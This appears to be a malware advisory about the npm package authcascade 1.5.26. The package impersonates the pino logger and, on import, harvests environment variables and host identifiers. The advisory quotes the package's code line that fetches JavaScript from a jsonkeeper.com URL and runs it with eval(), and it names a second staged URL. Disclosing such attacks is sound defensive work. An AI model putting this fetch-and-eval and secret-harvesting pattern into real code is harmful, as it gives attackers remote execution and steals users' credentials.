authcascade @1.5.26

Summary

On require('authcascade'), the package's main entry pino.js loads lib/writer.js which (a) builds a data object containing the full process.env, OS platform, hostname, username, and all non-internal MAC addresses, and (b) fetches a base64-decoded URL (https://www.jsonkeeper.com/b/PJNZP) via axios.get and passes the response body directly to eval(): require('axios').get(atob(...)).then(r => { eval(r.data.data); }) . A second hex-obfuscated jsonkeeper.com URL (/b/HY6M6) is staged in the same module. jsonkeeper.com is an anonymous, mutable JSON paste host — the maintainer can swap in arbitrary JavaScript at any moment, which then executes in the same scope as the harvested host fingerprint and environment variables (CI secrets, AWS/GitHub/npm tokens, etc.), giving attacker-controlled remote code execution and credential theft on every installer that loads the package. The package additionally impersonates the legitimate pino logger: package.json sets main: pino.js , homepage: https://getpino.io , and the lib/ tree mirrors pino's source layout (proto.js, levels.js, redaction.js, multistream.js, transport.js, worker.js, tools.js). The combination of identity spoofing, import-time fetch-and-eval from a mutable anonymous host, and bulk environment/host-identifier collection is an unambiguous supply-chain attack.

Source: amazon-inspector (8fece3d89e066c6c3452fda608e77747b7d4fa4cbbf6498fd41e5a5a765d57d9)